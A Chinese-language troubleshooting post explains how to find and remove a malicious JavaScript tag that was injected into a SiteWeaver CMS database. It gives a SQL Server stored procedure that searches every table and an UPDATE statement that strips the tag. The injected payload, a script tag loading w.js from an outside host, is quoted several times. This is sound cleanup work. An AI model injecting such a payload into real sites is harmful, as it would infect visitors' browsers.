問題:動易數據庫連續幾天被注入JS代碼�����,那么可不可以直接從數據庫著手進行清除木馬代碼操作呢�����?
數據庫被注入的代碼是:"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--
解決:發現在PE_CLASS表中的tips、Meta_Keywords�����、Meta_Description、LinkUrl字段存在注入的JS����,表太多���,一個一個去查,是比較費時費力的��,那么我們可以通過一個全庫搜索的方法��,建立一個存儲過程
create proc p_search
@str Nvarchar(1000) --要搜索的字符串
as
if @str='' return
declare @s Nvarchar(4000)
create table #t(表名 sysname,字段名 sysname)
declare tb cursor local for
select s='if exists(select 1 from [' replace(b.name,']',']]') '] where [' a.name '] like N''%' @str '%'')
print ''所在的表及字段: [' b.name '].[' a.name ']'''
from syscolumns a join sysobjects b on a.id=b.id
where b.xtype='U' and a.status>=0
and a.xtype in(175,239,99,35,231,167)
open tb
fetch next from tb into @s
while @@fetch_status=0
begin
exec(@s)
fetch next from tb into @s
end
close tb
deallocate tb
GO
執行:p_search '"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--'
找到被注入的表及字段��,執行恢復操作,下面是一個例子
UPDATE PE_Class SET Tips= Replace(Tips,'"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--','')
注意:以上雖然能較方便的處理木馬代碼��,但我們仍要對網站文件進行清查工作��,不然網站是會反復中木馬的�,特別是對于有生成靜態頁面的網站��,我們要重新生成下網站頁面����,以正常的生成頁面覆蓋現有木馬代碼的頁面���。
